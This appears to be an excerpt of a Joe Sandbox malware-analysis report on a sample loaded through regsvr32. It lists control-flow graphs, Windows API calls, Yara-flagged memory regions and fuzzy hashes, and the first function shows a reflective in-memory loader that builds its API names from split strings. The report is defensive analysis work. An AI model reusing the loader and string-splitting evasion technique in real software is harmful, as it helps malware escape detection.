                                                                                                                                      control_flow_graph 8 560000-560460 call 560aa8 * 2 VirtualAlloc 30 560462-560466 8->30 31 56048a-560494 8->31 32 560468-560488 30->32 34 560a91-560aa6 31->34 35 56049a-56049e 31->35 32->31 32->32 35->34 36 5604a4-5604a8 35->36 36->34 37 5604ae-5604b2 36->37 37->34 38 5604b8-5604bf 37->38 38->34 39 5604c5-5604d2 38->39 39->34 40 5604d8-5604e1 39->40 40->34 41 5604e7-5604f4 40->41 41->34 42 5604fa-560507 41->42 43 560531-560567 GetNativeSystemInfo 42->43 44 560509-560511 42->44 43->34 46 56056d-560589 VirtualAlloc 43->46 45 560513-560518 44->45 47 560521 45->47 48 56051a-56051f 45->48 49 5605a0-5605ac 46->49 50 56058b-56059e 46->50 51 560523-56052f 47->51 48->51 52 5605af-5605b2 49->52 50->49 51->43 51->45 54 5605b4-5605bf 52->54 55 5605c1-5605db 52->55 54->52 56 5605dd-5605e2 55->56 57 56061b-560622 55->57 58 5605e4-5605ea 56->58 59 5606db-5606e2 57->59 60 560628-56062f 57->60 61 5605ec-560609 58->61 62 56060b-560619 58->62 64 560864-56086b 59->64 65 5606e8-5606f9 59->65 60->59 63 560635-560642 60->63 61->61 61->62 62->57 62->58 63->59 68 560648-56064f 63->68 66 560917-560929 64->66 67 560871-56087f 64->67 69 560702-560705 65->69 70 560a07-560a1a 66->70 71 56092f-560937 66->71 72 56090e-560911 67->72 73 560654-560658 68->73 74 560707-56070a 69->74 75 5606fb-5606ff 69->75 98 560a40-560a4a 70->98 99 560a1c-560a27 70->99 77 56093b-56093f 71->77 72->66 76 560884-5608a9 72->76 78 5606c0-5606ca 73->78 79 56070c-56071d 74->79 80 560788-56078e 74->80 75->69 103 560907-56090c 76->103 104 5608ab-5608b1 76->104 83 560945-56095a 77->83 84 5609ec-5609fa 77->84 81 5606cc-5606d2 78->81 82 56065a-560669 78->82 85 560794-5607a2 79->85 86 56071f-560720 79->86 80->85 81->73 90 5606d4-5606d5 81->90 94 56067a-56067e 82->94 95 56066b-560678 82->95 92 56095c-56095e 83->92 93 56097b-56097d 83->93 84->77 96 560a00-560a01 84->96 88 56085d-56085e 85->88 89 5607a8 85->89 97 560722-560784 86->97 88->64 100 5607ae-5607d4 89->100 90->59 105 560960-56096c 92->105 106 56096e-560979 92->106 108 5609a2-5609a4 93->108 109 56097f-560981 93->109 110 560680-56068a 94->110 111 56068c-560690 94->111 107 5606bd-5606be 95->107 96->70 97->97 112 560786 97->112 101 560a4c-560a54 98->101 102 560a7b-560a8e 98->102 113 560a38-560a3e 99->113 137 5607d6-5607d9 100->137 138 560835-560839 100->138 101->102 119 560a56-560a79 RtlAddFunctionTable 101->119 102->34 103->72 116 5608b3-5608b9 104->116 117 5608bb-5608c8 104->117 120 5609be-5609bf 105->120 106->120 107->78 114 5609a6-5609aa 108->114 115 5609ac-5609bb 108->115 121 560983-560987 109->121 122 560989-56098b 109->122 123 5606b6-5606ba 110->123 124 5606a5-5606a9 111->124 125 560692-5606a3 111->125 112->85 113->98 118 560a29-560a35 113->118 114->120 115->120 127 5608ea-5608fe 116->127 128 5608d3-5608e5 117->128 129 5608ca-5608d1 117->129 118->113 119->102 126 5609c5-5609cb 120->126 121->120 122->108 132 56098d-56098f 122->132 123->107 124->107 133 5606ab-5606b3 124->133 125->123 134 5609cd-5609d3 126->134 135 5609d9-5609e9 VirtualProtect 126->135 127->103 147 560900-560905 127->147 128->127 129->128 129->129 139 560991-560997 132->139 140 560999-5609a0 132->140 133->123 134->135 135->84 142 5607e3-5607f0 137->142 143 5607db-5607e1 137->143 144 560844-560850 138->144 145 56083b 138->145 139->120 140->126 149 5607f2-5607f9 142->149 150 5607fb-56080d 142->150 148 560812-56082c 143->148 144->100 146 560856-560857 144->146 145->144 146->88 147->104 148->138 152 56082e-560833 148->152 149->149 149->150 150->148 152->137
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.284487860.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_560000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                                                                                      • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                                                                                                      • API String ID: 394283112-2517549848
                                                                                                                                      • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                                                                      • Instruction ID: ec91f80fdcff5eeff2f5e540fcd54e47381eb81e866dd697016cc476dff86391
                                                                                                                                      • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                                                                      • Instruction Fuzzy Hash: 6C72D630618B488FDB29DF18C8856BABBE1FB98305F10562DE8CBD7251DB34D946CB85
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: #C$(I$-:$Ekf$<W$Z$l$l
                                                                                                                                      • API String ID: 0-464535774
                                                                                                                                      • Opcode ID: d8792019bb8cd892c5e2cff0ba87425d7977148afb5a5f987cda1e45d5ff9126
                                                                                                                                      • Instruction ID: edc4d0e98499d5b5adff65828f8d1fd2ac7ce79502a6533da94e18623254a36a
                                                                                                                                      • Opcode Fuzzy Hash: d8792019bb8cd892c5e2cff0ba87425d7977148afb5a5f987cda1e45d5ff9126
                                                                                                                                      • Instruction Fuzzy Hash: C102E3B151038CDBCB99DF28C8CAADD3BA1FB48398F956219FD0697260D774D884CB85
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 253 180007958-1800079e2 call 1800142a0 256 1800079e5-1800079eb 253->256 257 1800079f1 256->257 258 180007f68-180007f6e 256->258 261 180007eb7-180007f4d call 180021434 257->261 262 1800079f7-1800079fd 257->262 259 180008084-180008101 call 180021434 258->259 260 180007f74-180007f7a 258->260 278 180008103-180008108 259->278 279 18000810d 259->279 265 180007fb4-180008075 call 18001e794 260->265 266 180007f7c-180007f82 260->266 271 180007f52-180007f58 261->271 267 180007d01-180007e4c call 180008738 262->267 268 180007a03-180007a09 262->268 277 18000807a-18000807f 265->277 272 180007f84-180007f8a 266->272 273 180007f9a-180007faf 266->273 267->277 288 180007e52-180007eaf call 18001d408 267->288 274 180007c76-180007cf7 call 180013e28 268->274 275 180007a0f-180007a15 268->275 280 1800081dd-1800081fd 271->280 281 180007f5e 271->281 283 18000811e-180008124 272->283 284 180007f90-180007f95 272->284 273->256 274->267 285 180007a1b-180007a21 275->285 286 180007b1d-180007c71 call 180018c60 call 180001b1c 275->286 290 180007b0c-180007b18 278->290 291 180008112-18000811b 279->291 281->258 283->280 292 18000812a 283->292 284->256 294 180007a27-180007a2d 285->294 295 18000812f-1800081d8 call 180013e28 285->295 286->291 288->261 290->256 291->283 292->256 294->283 296 180007a33-180007af3 call 18002b4c4 294->296 295->280 303 180007af8-180007b06 296->303 303->290
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 0n)G$9i&$IS_$c)K$oh$oh$J
                                                                                                                                      • API String ID: 0-4168131144
                                                                                                                                      • Opcode ID: 30d22681d77451a804741155910a8214494d75842a214bfc255a7dbc84502ded
                                                                                                                                      • Instruction ID: 1745985c1503e7a5a98bbeacef01b65c9f03634c62e3202666f04ad1fcc3199d
                                                                                                                                      • Opcode Fuzzy Hash: 30d22681d77451a804741155910a8214494d75842a214bfc255a7dbc84502ded
                                                                                                                                      • Instruction Fuzzy Hash: 69423870A0470CABCB58DF68C58AADEBBF1FB44304F40C169EC4AAB250D7759B19CB85
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 355 180010ff4-180011016 356 180011020 355->356 357 180011022-180011028 356->357 358 180011814 357->358 359 18001102e-180011034 357->359 362 180011819-18001181f 358->362 360 1800114e2-1800114ec 359->360 361 18001103a-180011040 359->361 365 1800114f5-18001151d 360->365 366 1800114ee-1800114f3 360->366 363 1800113e2-1800114d2 call 180008200 361->363 364 180011046-18001104c 361->364 362->357 367 180011825-180011832 362->367 363->367 374 1800114d8-1800114dd 363->374 364->362 368 180011052-18001120b call 180021040 call 1800291ac 364->368 369 180011523-1800117f4 call 180016314 call 1800291ac call 18001e2bc 365->369 366->369 381 180011212-1800113d7 call 1800291ac call 18001e2bc 368->381 382 18001120d 368->382 385 1800117f9-180011803 369->385 374->357 381->367 390 1800113dd 381->390 382->381 385->367 387 180011805-18001180f 385->387 387->357 390->356
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: )|x$/Zb$/v|$OV4T$\$lA
                                                                                                                                      • API String ID: 0-3528011396
                                                                                                                                      • Opcode ID: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
                                                                                                                                      • Instruction ID: 5dbdb21e6b24644f90705741d0e2e2cc24c858ca1caac6c8284349b4f9dc1789
                                                                                                                                      • Opcode Fuzzy Hash: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
                                                                                                                                      • Instruction Fuzzy Hash: 8C2204705097C8CBDBBECF64C885BDA7BA8FB44B08F10521DEA4A9E258DB745744CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 391 180021618-180021653 392 180021655-18002165a 391->392 393 180021bf3-180021c25 392->393 394 180021660-180021665 392->394 395 180021c2a-180021c2f 393->395 396 180021a81-180021bda call 180016314 394->396 397 18002166b-180021670 394->397 399 180021838-180021845 395->399 400 180021c35 395->400 404 180021bdf-180021bee 396->404 401 1800219f3-180021a7c call 180001b1c 397->401 402 180021676-18002167b 397->402 400->392 401->392 405 1800219e4-1800219ee 402->405 406 180021681-180021686 402->406 404->392 405->392 408 1800219d5-1800219df call 18001dfb4 406->408 409 18002168c-180021691 406->409 408->392 410 180021697-18002169c 409->410 411 18002190c-1800219a5 call 18000abac 409->411 414 1800216a2-1800216a7 410->414 415 180021846-180021907 call 180021434 410->415 418 1800219aa-1800219b0 411->418 414->395 419 1800216ad-180021835 call 180008200 call 1800166c0 414->419 415->392 421 1800219b2-1800219c6 418->421 422 1800219cb-1800219d0 418->422 419->399 421->392 422->392
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: $&.+$)O$.pN$F>9$t(/
                                                                                                                                      • API String ID: 0-3036092626
                                                                                                                                      • Opcode ID: 549a8b626face2190b4149bba4d09d4cb88f6d29378e8937dde350adb7fd5a83
                                                                                                                                      • Instruction ID: e4baced68933c0a0796cf32b330105f1a6d3ed4de4784e8c7f389f9334031704
                                                                                                                                      • Opcode Fuzzy Hash: 549a8b626face2190b4149bba4d09d4cb88f6d29378e8937dde350adb7fd5a83
                                                                                                                                      • Instruction Fuzzy Hash: E6E109716093C89FEBBACF24C8897DE7BA1FB59344F50421DD88A8E250DB745B49CB42
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 456 180028c20-180028c53 457 180028c58-180028c5e 456->457 458 180028c64-180028c6a 457->458 459 1800290ae-180029147 call 180013e28 457->459 460 1800290a4-1800290a9 458->460 461 180028c70-180028c76 458->461 469 18002914c-180029152 459->469 460->457 463 180029003-18002909f call 180008ea0 461->463 464 180028c7c-180028c82 461->464 463->457 467 180028c88-180028c8e 464->467 468 180028fab-180028ffe call 1800223c4 464->468 472 180028c94-180028c9a 467->472 473 180028df6-180028e1e 467->473 468->457 474 180029154 469->474 475 18002919c-1800291a8 469->475 478 180028d62-180028ddb call 180016bd8 472->478 479 180028ca0-180028ca6 472->479 473->457 477 180028e24-180028e3c 473->477 474->457 481 180028e42-180028ee6 call 18001d49c 477->481 482 180028ee9-180028f0b 477->482 485 180028de0-180028de6 478->485 483 180028cac-180028cb2 479->483 484 180029159-180029197 call 1800164c8 479->484 481->482 487 180028f94-180028f95 482->487 488 180028f11-180028f92 call 18001d49c 482->488 483->469 489 180028cb8-180028d5d call 180010c00 483->489 484->475 485->475 491 180028dec-180028df1 485->491 494 180028f98-180028f9b 487->494 488->494 489->457 491->457 494->457 496 180028fa1-180028fa6 494->496 496->457
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: :G$Q27$_5$yy8x$Mh
                                                                                                                                      • API String ID: 0-3587547327
                                                                                                                                      • Opcode ID: 315710b1bd8495485e823c5d8e4dda2fa20a4e0309c27e75a691e805bd33ac06
                                                                                                                                      • Instruction ID: f758bc8895b8ed7f582f71be29fb7142b0f1d07f9cbefdc8313849e51cf7b1d3
                                                                                                                                      • Opcode Fuzzy Hash: 315710b1bd8495485e823c5d8e4dda2fa20a4e0309c27e75a691e805bd33ac06
                                                                                                                                      • Instruction Fuzzy Hash: 3DF1E07051434CEBDFA9DF68C8CAA9D3BA0FF48394FA06219FD0696250D775D988CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 499 18000c608-18000c62d 500 18000c632-18000c637 499->500 501 18000cc8a-18000cc8f 500->501 502 18000c63d 500->502 503 18000cc95-18000cc9a 501->503 504 18000cf2b-18000cfaf call 18001f7c0 call 18001c32c 501->504 505 18000c643-18000c648 502->505 506 18000cb7d-18000cc23 call 1800269b0 call 18001c32c 502->506 507 18000ce33-18000ced7 call 180008ad8 call 18001c32c 503->507 508 18000cca0-18000cca5 503->508 538 18000cfb4-18000d00a call 1800194a4 504->538 509 18000caa5-18000cb78 call 1800176b8 call 18001c32c call 1800194a4 505->509 510 18000c64e-18000c653 505->510 541 18000cc28-18000cc85 call 1800194a4 506->541 545 18000cedc-18000cf26 call 1800194a4 507->545 514 18000cd35-18000cdce call 18000703c call 18001c32c 508->514 515 18000ccab-18000ccb0 508->515 509->500 517 18000c9c1-18000caa0 call 18002870c call 18001c32c call 1800194a4 510->517 518 18000c659-18000c65e 510->518 559 18000cdd3-18000ce2e call 1800194a4 514->559 522 18000ccb6-18000cd30 call 180021434 515->522 523 18000d00f-18000d014 515->523 517->500 525 18000c664-18000c669 518->525 526 18000c8bb-18000c963 call 180002610 call 18001c32c 518->526 522->500 523->500 539 18000d01a-18000d020 523->539 534 18000c7b2-18000c85a call 180019618 call 18001c32c 525->534 535 18000c66f-18000c674 525->535 566 18000c968-18000c9bc call 1800194a4 526->566 568 18000c85f-18000c8b6 call 1800194a4 534->568 535->523 548 18000c67a-18000c73d call 180002178 call 18001c32c 535->548 538->523 541->500 545->500 574 18000c742-18000c7ad call 1800194a4 548->574 559->500 566->500 568->500 574->500
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: +#;)$K'$sf$w\H
                                                                                                                                      • API String ID: 0-1051058546
                                                                                                                                      • Opcode ID: 6c53062de77b202a7a918e5f4038520a98252693d28bf41343123917f80ba32c
                                                                                                                                      • Instruction ID: 30c6111824d62709d88844cae5ccd518ea343406d57bec7882368cdc1c6a6611
                                                                                                                                      • Opcode Fuzzy Hash: 6c53062de77b202a7a918e5f4038520a98252693d28bf41343123917f80ba32c
                                                                                                                                      • Instruction Fuzzy Hash: 8362F97050068D8FDB48DF28C89A6DD3FA1FB58388F524229FC4AA7251D778D999CBC4
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: <4P$<8$<w.
                                                                                                                                      • API String ID: 0-1030867500
                                                                                                                                      • Opcode ID: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
                                                                                                                                      • Instruction ID: 97d266913d6b0fd63d839b3c54903fd41a2ccd22a8a26fffcb9587bfe3b6431f
                                                                                                                                      • Opcode Fuzzy Hash: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
                                                                                                                                      • Instruction Fuzzy Hash: C8B1E17151A384ABD788CF28C1C994BBBE1FBD4754F906A1DF8C68B260D7B0D948CB02
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: %'#$'1O"
                                                                                                                                      • API String ID: 0-3508158491
                                                                                                                                      • Opcode ID: 7a3bc090f4985b1e57649fadf31b142a2b067212ca7952ade99d041dbd471a2f
                                                                                                                                      • Instruction ID: 10e181b0c1a65fbc894e9b150557277c676d109d9ee8fa061bdc989f931bd19f
                                                                                                                                      • Opcode Fuzzy Hash: 7a3bc090f4985b1e57649fadf31b142a2b067212ca7952ade99d041dbd471a2f
                                                                                                                                      • Instruction Fuzzy Hash: A541C471D1471C9FCB84CFA8D98AACDBBF0FB48354F249119E445B6250D3B85988CF69
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
                                                                                                                                      • Instruction ID: 281782cf28aa09d34d334260f991d1b96cfbd8271b51b9b7c31761fd0664cb75
                                                                                                                                      • Opcode Fuzzy Hash: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
                                                                                                                                      • Instruction Fuzzy Hash: 4B51EC715087889BCBB8DF18C9856CA7BF0FF95704F50891DE9898B250DF719A44DB42
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 153 7ffc67202154-7ffc67202160 154 7ffc67202162-7ffc6720216b call 7ffc67204110 153->154 155 7ffc672021e1-7ffc672021e3 153->155 163 7ffc6720216d-7ffc6720216f 154->163 167 7ffc67202174-7ffc6720217b call 7ffc67202fa0 154->167 157 7ffc672021e5-7ffc672021ed 155->157 158 7ffc6720221e-7ffc67202221 155->158 162 7ffc672021f3-7ffc67202201 157->162 157->163 159 7ffc67202279-7ffc6720227c 158->159 160 7ffc67202223-7ffc67202232 call 7ffc67202c88 call 7ffc67203108 158->160 164 7ffc67202285 159->164 165 7ffc6720227e-7ffc67202280 call 7ffc67202f50 159->165 180 7ffc67202237-7ffc6720223d 160->180 168 7ffc67202208-7ffc6720220b 162->168 169 7ffc67202203 call 7ffc672036d0 162->169 170 7ffc6720228a-7ffc6720228f 163->170 164->170 165->164 181 7ffc67202184-7ffc672021a9 call 7ffc672040a0 GetCommandLineA call 7ffc67203eec call 7ffc67203758 167->181 182 7ffc6720217d-7ffc67202182 call 7ffc6720415c 167->182 168->164 175 7ffc6720220d-7ffc6720221c call 7ffc67203a48 call 7ffc67202c94 call 7ffc6720415c 168->175 169->168 175->164 180->163 185 7ffc67202243-7ffc67202257 FlsSetValue 180->185 202 7ffc672021ab-7ffc672021b0 call 7ffc67202c94 181->202 203 7ffc672021b2-7ffc672021b9 call 7ffc67203df4 181->203 182->163 190 7ffc67202259-7ffc6720226d call 7ffc67202cbc GetCurrentThreadId 185->190 191 7ffc6720226f-7ffc67202274 call 7ffc67203024 185->191 190->164 191->163 202->182 208 7ffc672021bb-7ffc672021c2 call 7ffc67203aec 203->208 209 7ffc672021da-7ffc672021df call 7ffc67203a48 203->209 208->209 214 7ffc672021c4-7ffc672021c6 call 7ffc6720347c 208->214 209->202 216 7ffc672021cb-7ffc672021cd 214->216 216->209 217 7ffc672021cf-7ffc672021d5 216->217 217->164
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 00007FFC67204110: HeapCreate.KERNELBASE(?,?,?,?,00007FFC67202169), ref: 00007FFC67204122
                                                                                                                                        • Part of subcall function 00007FFC67204110: HeapSetInformation.KERNEL32 ref: 00007FFC6720414C
                                                                                                                                      • _RTC_Initialize.LIBCMT ref: 00007FFC67202184
                                                                                                                                      • GetCommandLineA.KERNEL32 ref: 00007FFC67202189
                                                                                                                                        • Part of subcall function 00007FFC67203EEC: GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FFC6720219B), ref: 00007FFC67203F1B
                                                                                                                                        • Part of subcall function 00007FFC67203EEC: GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FFC6720219B), ref: 00007FFC67203F5B
                                                                                                                                        • Part of subcall function 00007FFC67203758: GetStartupInfoA.KERNEL32 ref: 00007FFC6720377D
                                                                                                                                      • __setargv.LIBCMT ref: 00007FFC672021B2
                                                                                                                                      • _cinit.LIBCMT ref: 00007FFC672021C6
                                                                                                                                        • Part of subcall function 00007FFC67202C94: FlsFree.KERNEL32(?,?,?,?,00007FFC67202217), ref: 00007FFC67202CA3
                                                                                                                                        • Part of subcall function 00007FFC67202C94: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFC67202217), ref: 00007FFC67206A32
                                                                                                                                        • Part of subcall function 00007FFC67202C94: free.LIBCMT ref: 00007FFC67206A3B
                                                                                                                                        • Part of subcall function 00007FFC67202C94: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFC67202217), ref: 00007FFC67206A5B
                                                                                                                                        • Part of subcall function 00007FFC67203108: Sleep.KERNEL32(?,?,0000000A,00007FFC67202DA3,?,?,?,00007FFC67202DFF,?,?,?,00007FFC6720254F,?,?,?,00007FFC6720262A), ref: 00007FFC6720314D
                                                                                                                                      • FlsSetValue.KERNEL32 ref: 00007FFC6720224C
                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00007FFC67202260
                                                                                                                                      • free.LIBCMT ref: 00007FFC6720226F
                                                                                                                                        • Part of subcall function 00007FFC67203024: HeapFree.KERNEL32(?,?,00000000,00007FFC67202DDC,?,?,?,00007FFC67202DFF,?,?,?,00007FFC6720254F,?,?,?,00007FFC6720262A), ref: 00007FFC6720303A
                                                                                                                                        • Part of subcall function 00007FFC67203024: _errno.LIBCMT ref: 00007FFC67203044
                                                                                                                                        • Part of subcall function 00007FFC67203024: GetLastError.KERNEL32(?,?,00000000,00007FFC67202DDC,?,?,?,00007FFC67202DFF,?,?,?,00007FFC6720254F,?,?,?,00007FFC6720262A), ref: 00007FFC6720304C
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Heapfree$CriticalDeleteEnvironmentFreeSectionStrings$CommandCreateCurrentErrorInfoInformationInitializeLastLineSleepStartupThreadValue__setargv_cinit_errno
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1549890855-0
                                                                                                                                      • Opcode ID: 1bfc46722c3ac8e7b1a3fe84d8ded69fde3dc3f1e7eef4d63a5cdedb7541036a
                                                                                                                                      • Instruction ID: 69029bdde3825e8f7c9c4ff3c67fabf8883d1d7dd56574b65007290c5e20a80e
                                                                                                                                      • Opcode Fuzzy Hash: 1bfc46722c3ac8e7b1a3fe84d8ded69fde3dc3f1e7eef4d63a5cdedb7541036a
                                                                                                                                      • Instruction Fuzzy Hash: FE31D0A0E0D23FC6FA64A7B3592E27953D5AF6535CF105D3ADA1E452C3EE2CA440C232
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • _getptd.LIBCMT ref: 00007FFC67204CF3
                                                                                                                                        • Part of subcall function 00007FFC6720497C: GetOEMCP.KERNEL32(?,?,?,?,?,?,?,00007FFC67204D0E,?,?,?,?,?,00007FFC67204EE3), ref: 00007FFC672049A6
                                                                                                                                        • Part of subcall function 00007FFC6720309C: Sleep.KERNEL32(?,?,00000000,00007FFC67206B19,?,?,00000000,00007FFC67206BC3,?,?,?,?,?,?,00000000,00007FFC67202DC8), ref: 00007FFC672030D2
                                                                                                                                      • free.LIBCMT ref: 00007FFC67204D7F
                                                                                                                                        • Part of subcall function 00007FFC67203024: HeapFree.KERNEL32(?,?,00000000,00007FFC67202DDC,?,?,?,00007FFC67202DFF,?,?,?,00007FFC6720254F,?,?,?,00007FFC6720262A), ref: 00007FFC6720303A
                                                                                                                                        • Part of subcall function 00007FFC67203024: _errno.LIBCMT ref: 00007FFC67203044
                                                                                                                                        • Part of subcall function 00007FFC67203024: GetLastError.KERNEL32(?,?,00000000,00007FFC67202DDC,?,?,?,00007FFC67202DFF,?,?,?,00007FFC6720254F,?,?,?,00007FFC6720262A), ref: 00007FFC6720304C
                                                                                                                                      • _lock.LIBCMT ref: 00007FFC67204DB7
                                                                                                                                      • free.LIBCMT ref: 00007FFC67204E67
